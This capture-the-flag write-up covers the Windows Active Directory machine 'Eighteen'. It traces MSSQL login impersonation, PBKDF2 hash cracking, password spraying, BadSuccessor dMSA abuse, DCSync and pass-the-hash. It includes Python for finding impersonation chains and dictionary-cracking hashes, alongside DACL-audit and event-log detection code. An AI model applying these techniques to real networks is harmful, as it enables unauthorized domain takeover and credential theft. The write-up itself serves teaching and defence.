Difficulty: Medium
Operating System: Windows


Executive Summary

Eighteen is a Windows Active Directory machine that combines database misconfigurations, password reuse, and modern Active Directory abuse techniques to achieve full domain compromise.

The attack begins with access to a Microsoft SQL Server instance, progresses through credential recovery and password reuse, and ultimately leverages the BadSuccessor technique to abuse delegated Managed Service Accounts (dMSA), resulting in Domain Administrator privileges.


Attack Path

MSSQL Access (kevin)
    → Login Impersonation (appdev)
    → Financial Planner Database
    → PBKDF2 Credential Recovery
    → Password Reuse
    → WinRM Access (adam.scott)
    → BadSuccessor (dMSA Abuse)
    → Kerberos Impersonation
    → DCSync
    → Domain Administrator

Reconnaissance

Service Enumeration

Initial enumeration revealed a limited attack surface:

  • Kerberos (88)
  • Microsoft SQL Server (1433)

A host answering on 88 is running a KDC, so the target is a domain controller rather than a standalone database server.

Further service identification confirmed:

  • Microsoft SQL Server 2022
  • Windows Server 2025 Build 26100

The Windows Server 2025 build matters later: it is the first release whose KDC understands delegated Managed Service Accounts. For now, the exposed SQL Server immediately became the primary attack vector.


Initial Access

MSSQL Enumeration

Valid credentials for the SQL login kevin were available from the start.

After authentication, database enumeration revealed a custom database named:

financial_planner

Although kevin could not read that database directly, enumerating sys.server_permissions identified an interesting privilege assignment.

Login Impersonation

The login kevin held the IMPERSONATE permission on another SQL login:

appdev

EXECUTE AS LOGIN = 'appdev' switches the session's security context to that login without knowing its password, and appdev had access to financial_planner, so the impersonated session could read it. REVERT returns to the original context, but nothing forces the caller to revert.

This demonstrates a common issue in enterprise environments: IMPERSONATE is granted for convenience (service accounts, migrations, troubleshooting) and rarely revoked, and each grant silently extends one login's reach to everything the impersonated login can see.
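The impersonation step above, as an added example written for this edit rather than taken from the box or the original writeup. It runs the sys.server_permissions query through any DB-API cursor, follows IMPERSONATE grants transitively (the page shows a single hop, kevin to appdev; the search generalises to chains such as appdev to sa), and builds an EXECUTE AS LOGIN batch that always reverts. The appdev-to-sa grant and the back-edge in the sample are constructed to show chaining and cycle handling; no table names from the application are assumed, so discovery goes through sys.tables.

```python
"""Enumerate SQL Server IMPERSONATE grants and find impersonation chains.

Any DB-API 2.0 cursor works (pymssql, pyodbc); the path finder itself is pure Python.
"""
from collections import deque

# Every GRANT of IMPERSONATE on a server principal, as (grantee, login it may impersonate).
# For a SERVER_PRINCIPAL-class permission, major_id is the principal_id of the target login.
IMPERSONATE_GRANTS_SQL = """
SELECT grantee.name, target.name
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE'
  AND p.state_desc = 'GRANT';
"""


def fetch_impersonate_grants(cursor):
    """Run the query through a DB-API cursor and return a list of (grantee, target) edges."""
    cursor.execute(IMPERSONATE_GRANTS_SQL)
    return [(str(row[0]), str(row[1])) for row in cursor.fetchall()]


def impersonation_paths(grants, start):
    """Breadth-first search over impersonation edges from `start`.

    Returns {reachable_login: [start, ..., reachable_login]}. Chains are followed
    transitively (A may impersonate B, B may impersonate sa => A reaches sa), and
    cycles are harmless because each login is visited once.
    """
    adjacency = {}
    for grantee, target in grants:
        adjacency.setdefault(grantee, []).append(target)
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        current = queue.popleft()
        for nxt in adjacency.get(current, []):
            if nxt not in paths:
                paths[nxt] = paths[current] + [nxt]
                queue.append(nxt)
    return paths


def execute_as_login_batch(login, statements):
    """Build a T-SQL batch that runs `statements` as `login` and always REVERTs.

    EXECUTE AS LOGIN takes a literal, not a parameter, so the login name is quoted
    by doubling single quotes. The CATCH block reverts before re-raising so a failed
    statement never leaves the session stuck in the impersonated context.
    """
    literal = login.replace("'", "''")
    body = "\n    ".join(statements)
    return (
        f"EXECUTE AS LOGIN = N'{literal}';\n"
        "BEGIN TRY\n"
        f"    {body}\n"
        "END TRY\n"
        "BEGIN CATCH\n"
        "    REVERT;\n"
        "    THROW;\n"
        "END CATCH;\n"
        "REVERT;"
    )


# Constructed sample output of IMPERSONATE_GRANTS_SQL: the kevin -> appdev grant from the
# box, plus a made-up appdev -> sa grant and a back-edge to exercise chaining and cycles.
SAMPLE_GRANTS = [("kevin", "appdev"), ("appdev", "sa"), ("sa", "kevin")]

# Batch that confirms the context switch and lists the tables in financial_planner.
SAMPLE_BATCH = execute_as_login_batch("appdev", [
    "SELECT SUSER_SNAME() AS running_as;",
    "SELECT name FROM financial_planner.sys.tables;",
])

if __name__ == "__main__":
    for login, path in impersonation_paths(SAMPLE_GRANTS, "kevin").items():
        print(f"kevin reaches {login}: {' -> '.join(path)}")
    print(SAMPLE_BATCH)
```

Against a live instance, pass a pymssql or pyodbc cursor to fetch_impersonate_grants and feed the result to impersonation_paths; any path that ends at sa or at a sysadmin-role login is a full server compromise, not just a data exposure.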


Credential Recovery

Database Analysis

Reviewing the application’s database revealed a user table containing authentication data.

A PBKDF2-SHA256 password hash belonging to the administrative application account was recovered.

Password Cracking

The recovered hash used:

  • PBKDF2-SHA256
  • 600,000 iterations

That iteration count matches current OWASP guidance for PBKDF2-HMAC-SHA256, so the hashing was properly configured. It only buys time per guess, though: a weak password falls to a short wordlist no matter how expensive each guess is.

Hashcat successfully recovered:

iloveyou1
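An offline reproduction of the cracking step, added here as an example (the writeup itself used hashcat). It assumes the Django-style pbkdf2_sha256$iterations$salt$digest layout, which the page does not confirm; the salt, the wordlist and the sample hash are constructed, with the hash built from the recovered password and the page's 600,000 iterations.

```python
"""Offline dictionary attack against a PBKDF2-HMAC-SHA256 password hash.

Hash layout assumed: 'pbkdf2_sha256$<iterations>$<salt>$<base64 digest>' (the Django
convention); the page does not state which application produced the hash.
"""
import base64
import hashlib
import hmac
import time

DKLEN = 32  # bytes; SHA-256 output size, which is what this layout stores


def parse_hash(stored):
    """Return (iterations, salt bytes, digest bytes) from the stored string."""
    algorithm, iterations, salt, digest_b64 = stored.split("$")
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash type {algorithm!r}")
    return int(iterations), salt.encode(), base64.b64decode(digest_b64)


def derive(password, salt, iterations):
    """One PBKDF2-HMAC-SHA256 evaluation; the iteration count is the whole cost."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, DKLEN)


def make_hash(password, salt, iterations=600_000):
    """Produce a hash in the assumed layout (used here only to build the sample)."""
    digest = derive(password, salt.encode(), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${base64.b64encode(digest).decode()}"


def crack(stored, candidates):
    """Try each candidate in order; return the first that verifies, else None.

    hmac.compare_digest is used even though timing is irrelevant to an offline
    attacker, so the same helper is safe to reuse as a server-side verifier.
    """
    iterations, salt, digest = parse_hash(stored)
    for candidate in candidates:
        if hmac.compare_digest(derive(candidate, salt, iterations), digest):
            return candidate
    return None


def seconds_per_guess(stored):
    """Measure the per-candidate cost the iteration count imposes on this machine."""
    iterations, salt, _ = parse_hash(stored)
    start = time.perf_counter()
    derive("benchmark", salt, iterations)
    return time.perf_counter() - start


# Constructed sample: the recovered password hashed with the parameters from the page.
# The salt is made up; the application's real hash is not reproduced here.
SAMPLE_HASH = make_hash("iloveyou1", "kQ7rZx2pL9Vm")
WORDLIST = ["password", "123456", "qwerty", "iloveyou", "iloveyou1"]

if __name__ == "__main__":
    cost = seconds_per_guess(SAMPLE_HASH)
    print(f"{cost:.2f}s per guess here, about {86400 / cost:,.0f} guesses/day single-threaded")
    print("recovered:", crack(SAMPLE_HASH, WORDLIST))
```

The per-guess figure is the point: 600,000 iterations make each candidate cost a noticeable fraction of a second, yet a password that sits in the first few thousand entries of any common wordlist is still recovered in minutes. If the stored hash really is in this layout, hashcat mode 10000 (Django PBKDF2-SHA256) consumes it directly; the generic sha256:iterations:salt:digest layout is mode 10900.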

Why This Matters

This compromise was not caused by weak cryptography.

Instead, it highlights how password reuse and poor password selection can completely undermine otherwise strong security controls.


User Access

Password Reuse

At this stage, the recovered password was sprayed against the domain users discovered so far. Spraying one password across many accounts keeps every account well under the lockout threshold, which trying many passwords against one account would not.

Password spraying identified valid credentials for:

adam.scott

The same password was in use for this domain account, and the credentials provided access through WinRM.

WinRM Access

Successful authentication granted an interactive shell as a standard domain user.

This established the first foothold within Active Directory and allowed deeper enumeration of the environment.


Privilege Escalation

Active Directory Enumeration

Host and domain enumeration identified several important findings:

  • Windows Server 2025, the first release whose KDC supports delegated Managed Service Accounts (dMSA)
  • Membership in the IT group
  • CreateChild permissions on the Staff OU, held by the IT group
  • Delegation-related Active Directory configurations

None of these findings was exploitable on its own: CreateChild on an OU looks like a routine delegated-administration right. Together they formed the foundation of the eventual escalation path.


Understanding BadSuccessor

One of the most interesting aspects of Eighteen is the use of the BadSuccessor technique.

BadSuccessor targets delegated Managed Service Accounts (dMSA), a Windows Server 2025 feature introduced to migrate existing service accounts to managed accounts. A dMSA records the account it replaces in msDS-ManagedAccountPrecededByLink, and msDS-DelegatedMSAState tracks the migration (a value of 2 means completed).

The attack abuses the relationship between:

  • dMSA objects
  • the migration link to the superseded account
  • privileged Active Directory principals

Once the link points at a privileged account and the state is set to completed, the KDC treats the dMSA as that account's successor: tickets issued to the dMSA carry the superseded account's PAC, that is, its SID and group memberships. The KDC never checks that whoever wrote the link held any rights over the superseded account, so the only permission that matters is the right to create (or modify) a dMSA object, which an OU-level CreateChild grant provides. A single Windows Server 2025 domain controller is enough; the domain does not need to be using dMSAs at all.


Exploiting BadSuccessor

Because the IT group possessed CreateChild permissions on the Staff organizational unit, a new dMSA object (objectClass msDS-DelegatedManagedServiceAccount) could be created there.

The malicious dMSA was then pointed at the built-in Administrator account through the migration link, not through any Kerberos delegation setting.

As a result:

  1. A new dMSA was created under the Staff OU.
  2. msDS-ManagedAccountPrecededByLink was set to the distinguished name of the Administrator account.
  3. msDS-DelegatedMSAState was set to 2, marking the "migration" as completed.
  4. The attacker gained the ability to obtain Kerberos tickets carrying Administrator's identity.

This transformed a low-privileged user into an identity capable of performing administrative actions within the domain. Nothing on the Administrator object itself was changed; the whole escalation lives on the attacker-controlled object.


Domain Compromise

Kerberos Impersonation

Once the dMSA relationship was established, a Kerberos ticket was requested for the dMSA, using the low-privileged user's own TGT as the evidence ticket (Rubeus's asktgs with the /dmsa flag performs this request).

The resulting ticket's PAC contained Administrator's SID and group memberships, so it authenticated as Administrator wherever it was presented.

The reply also carried a KERB-DMSA-KEY-PACKAGE which, as the original BadSuccessor research showed, includes the keys of the superseded account: the ticket exposed Administrator's own authentication material as well as its identity.


DCSync

With Administrator's group memberships in the ticket came the replication extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which is all a DCSync attack needs.

DCSync abuses the Directory Replication Service (DRSUAPI) to ask a domain controller for directory objects, secret attributes included, exactly as a peer domain controller would.

Rather than attacking the controller itself, the attacker holds the rights a legitimate replication partner holds, and the domain controller answers the request as it would any other.

This allowed extraction of:

  • NTLM hashes
  • Kerberos keys
  • Administrator credentials

Administrator Access

The recovered Administrator NTLM hash was used for Pass-the-Hash authentication.

This provided full administrative access to the domain and completed the compromise.


Lessons Learned

MSSQL Impersonation

SQL Server impersonation permissions should be reviewed carefully: sys.server_permissions lists every IMPERSONATE grant, and each one extends the grantee's reach to everything the impersonated login can access.

Excessive delegation frequently exposes sensitive databases and application secrets.


Password Reuse

Strong hashing algorithms cannot compensate for weak or reused passwords.

Organizations should enforce unique credentials and password manager adoption.


Active Directory Delegation

CreateChild permissions on organizational units can be significantly more dangerous than they appear. A "create all child objects" grant covers every object class the schema allows, including classes such as dMSA that did not exist when the permission was granted.

Permissions should be audited regularly and granted only when operationally necessary, and scoped to the specific object classes an operator actually needs to create.
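An added audit for the precondition behind both the Exploiting BadSuccessor section and this lesson: given an OU's DACL, which principals can create dMSA objects in it. This is example code written for this edit, not a tool from the writeup. ACEs are plain dicts in the shape you get after parsing nTSecurityDescriptor (impacket's ldaptypes, or Get-Acl on the AD: drive); the SIDs, the DACL and both class GUIDs are constructed placeholders, and the real dMSA class GUID must be read from your own schema before running this against a domain.

```python
"""Audit an OU's DACL for the BadSuccessor precondition: who can create dMSA objects here.

The DACL is assumed canonical (explicit denies ahead of allows), which is what Windows
writes; ACEs are evaluated in order and the first matching deny wins.
"""
# Access-mask bits relevant to object creation in the directory.
ADS_RIGHT_DS_CREATE_CHILD = 0x00000001
GENERIC_ALL = 0x10000000
# ACE flag: the ACE governs children only, not the object that carries it.
INHERIT_ONLY_ACE = 0x08

# Resolve the real class GUID from the schema before use:
#   (&(objectClass=classSchema)(lDAPDisplayName=msDS-DelegatedManagedServiceAccount))
# and read schemaIDGUID. The value below is a constructed placeholder for the sample.
DMSA_CLASS_GUID = "ffffffff-0000-4000-8000-0000000dd5a0"


def ace_covers_create(ace, class_guid):
    """True if this ACE, on its own, speaks to creating an object of class_guid on this OU."""
    if ace.get("flags", 0) & INHERIT_ONLY_ACE:
        return False  # applies to sub-containers, not to this OU
    if not (ace["mask"] & (ADS_RIGHT_DS_CREATE_CHILD | GENERIC_ALL)):
        return False
    object_type = ace.get("object_type")
    # No object type means "create all child objects": every class, including ones
    # added to the schema (like dMSA) long after the permission was delegated.
    return object_type is None or object_type.lower() == class_guid.lower()


def can_create_dmsa(aces, principal_sids, class_guid=DMSA_CLASS_GUID):
    """Evaluate the DACL for a principal: its own SID plus its group SIDs (e.g. IT)."""
    sids = {s.upper() for s in principal_sids}
    for ace in aces:  # canonical order, so a matching deny is reached before any allow
        if ace["trustee"].upper() not in sids or not ace_covers_create(ace, class_guid):
            continue
        if ace["type"] == "DENY":
            return False
        if ace["type"] == "ALLOW":
            return True
    return False


def trustees_who_can_create_dmsa(aces, class_guid=DMSA_CLASS_GUID):
    """Every trustee SID the DACL lets create dMSAs, for a finding report."""
    denied = {a["trustee"] for a in aces if a["type"] == "DENY" and ace_covers_create(a, class_guid)}
    allowed = {a["trustee"] for a in aces if a["type"] == "ALLOW" and ace_covers_create(a, class_guid)}
    return sorted(allowed - denied)


# Constructed SIDs and DACL for the Staff OU. IT_GROUP has "create all child objects";
# HELPDESK may only create objects of another class; AUDITORS has an explicit deny in
# front of a generic allow; the Administrators allow is inherit-only on this container.
IT_GROUP = "S-1-5-21-1000000001-2000000002-3000000003-1105"
HELPDESK = "S-1-5-21-1000000001-2000000002-3000000003-1106"
AUDITORS = "S-1-5-21-1000000001-2000000002-3000000003-1107"
ADAM_SCOTT = "S-1-5-21-1000000001-2000000002-3000000003-1201"
OTHER_CLASS_GUID = "ffffffff-0000-4000-8000-0000000ff5a0"  # placeholder for some other class

STAFF_OU_DACL = [
    {"type": "DENY", "trustee": AUDITORS, "mask": ADS_RIGHT_DS_CREATE_CHILD, "object_type": None},
    {"type": "ALLOW", "trustee": AUDITORS, "mask": GENERIC_ALL, "object_type": None},
    {"type": "ALLOW", "trustee": IT_GROUP, "mask": ADS_RIGHT_DS_CREATE_CHILD, "object_type": None},
    {"type": "ALLOW", "trustee": HELPDESK, "mask": ADS_RIGHT_DS_CREATE_CHILD, "object_type": OTHER_CLASS_GUID},
    {"type": "ALLOW", "trustee": "S-1-5-32-544", "mask": GENERIC_ALL, "object_type": None,
     "flags": INHERIT_ONLY_ACE},
]

if __name__ == "__main__":
    print("adam.scott via IT:", can_create_dmsa(STAFF_OU_DACL, [ADAM_SCOTT, IT_GROUP]))
    print("can create dMSAs here:", trustees_who_can_create_dmsa(STAFF_OU_DACL))
```

The two cases worth noticing in the sample are the ones that usually get audits wrong: a class-scoped CreateChild for a different class (HELPDESK) is not a dMSA finding, while an unscoped CreateChild (IT_GROUP) is, regardless of what the OU was originally delegated for.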


BadSuccessor and dMSA Security

Organizations deploying Windows Server 2025 should review:

  • dMSA configurations
  • Delegation relationships
  • Administrative inheritance chains

In practice that means listing every object of class msDS-DelegatedManagedServiceAccount and checking what its msDS-ManagedAccountPrecededByLink points at: a link to a privileged account that nobody deliberately migrated is the artifact this attack leaves behind. Misconfigurations can create unexpected privilege escalation paths.


DCSync Detection

Domain replication privileges should be monitored closely: the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights should be held only by domain controllers and known synchronization accounts, and Event ID 4662 records every use of them.

Unexpected replication activity, meaning a 4662 carrying those rights from any identity that is not a domain controller, often indicates an ongoing compromise of Active Directory.
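Detection logic for the two Active Directory steps of the chain, covering the dMSA review above and this section, as an added example rather than anything from the writeup. It runs over constructed Security-log events and flags dMSA creation (5137), writes to the predecessor-link attributes (5136) and replication rights exercised by a non-DC identity (4662). Field names follow the events' EventData; the account names, DNs and domain in the samples are made up.

```python
"""Detections for the dMSA and DCSync steps, run over sample Security-log events.

Events are flat dicts keyed by the EventData field names (what winlogbeat or a SIEM
hands you after parsing). The sample events at the bottom are constructed.
"""
# Extended-right GUIDs that appear in a 4662's Properties when a principal pulls
# directory data the way a DC does. Any of them from a non-DC identity is DCSync.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dccf": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dccf": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DMSA_CLASS = "msds-delegatedmanagedserviceaccount"
BADSUCCESSOR_ATTRIBUTES = {"msds-managedaccountprecededbylink", "msds-delegatedmsastate"}


def detect(events, dc_accounts, replication_allowlist=frozenset()):
    """Return (rule, subject, detail) tuples for every event that matches a rule.

    dc_accounts: SAM names of the domain controllers' computer accounts (DC01$ ...).
    Do not exclude on a trailing '$': gMSA and dMSA names end with '$' as well, and a
    dMSA is exactly the identity a BadSuccessor operator would DCSync with.
    replication_allowlist: non-DC accounts that legitimately replicate (e.g. Entra Connect).
    """
    dcs = {a.lower() for a in dc_accounts}
    allow = {a.lower() for a in replication_allowlist}
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        subject = ev.get("SubjectUserName", "")
        if eid == 4662:
            props = ev.get("Properties", "").lower()
            rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
            if rights and subject.lower() not in dcs and subject.lower() not in allow:
                alerts.append(("dcsync", subject, ", ".join(rights)))
        elif eid == 5137 and ev.get("ObjectClass", "").lower() == DMSA_CLASS:
            alerts.append(("dmsa_created", subject, ev.get("ObjectDN", "")))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName", "").lower() in BADSUCCESSOR_ATTRIBUTES:
            detail = f'{ev["AttributeLDAPDisplayName"]}={ev.get("AttributeValue", "")}'
            alerts.append(("dmsa_predecessor_link", subject, detail))
    return alerts


# Constructed sample events: a DC replicating normally, the attacker creating a dMSA and
# linking it to Administrator, an unrelated attribute write, and the dMSA then DCSyncing.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dccf} {1131f6ad-9c07-11d1-f79f-00c04fc2dccf}"},
    {"EventID": 5137, "SubjectUserName": "adam.scott",
     "ObjectClass": "msDS-DelegatedManagedServiceAccount",
     "ObjectDN": "CN=svc_dmsa,OU=Staff,DC=example,DC=local"},
    {"EventID": 5136, "SubjectUserName": "adam.scott",
     "ObjectDN": "CN=svc_dmsa,OU=Staff,DC=example,DC=local",
     "AttributeLDAPDisplayName": "msDS-ManagedAccountPrecededByLink",
     "AttributeValue": "CN=Administrator,CN=Users,DC=example,DC=local"},
    {"EventID": 5136, "SubjectUserName": "adam.scott",
     "ObjectDN": "CN=svc_dmsa,OU=Staff,DC=example,DC=local",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "backup agent"},
    {"EventID": 4662, "SubjectUserName": "svc_dmsa$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dccf}"},
]
DC_ACCOUNTS = {"DC01$"}

if __name__ == "__main__":
    for rule, subject, detail in detect(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"[{rule}] {subject}: {detail}")
```

Two operational notes: 5136 and 5137 are only written when "Audit Directory Service Changes" is enabled and the OU carries a SACL for object creation and attribute writes, and 4662 needs "Audit Directory Service Access" on the domain controllers; neither is on by default. The allowlist exists because a naive "ends with $" exclusion, which many DCSync rules use, would have silently dropped the final event in the sample.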


Conclusion

Eighteen is an excellent example of a modern Active Directory attack chain.

The compromise does not rely on a single critical vulnerability. Instead, it demonstrates how multiple seemingly minor weaknesses can be combined to achieve full domain compromise.

The machine highlights several important concepts:

  • SQL Server impersonation abuse
  • Password reuse risks
  • Active Directory delegation
  • BadSuccessor and dMSA exploitation
  • Kerberos abuse
  • DCSync attacks

For defenders, Eighteen reinforces the importance of permission auditing, credential hygiene, and continuous monitoring of Active Directory environments.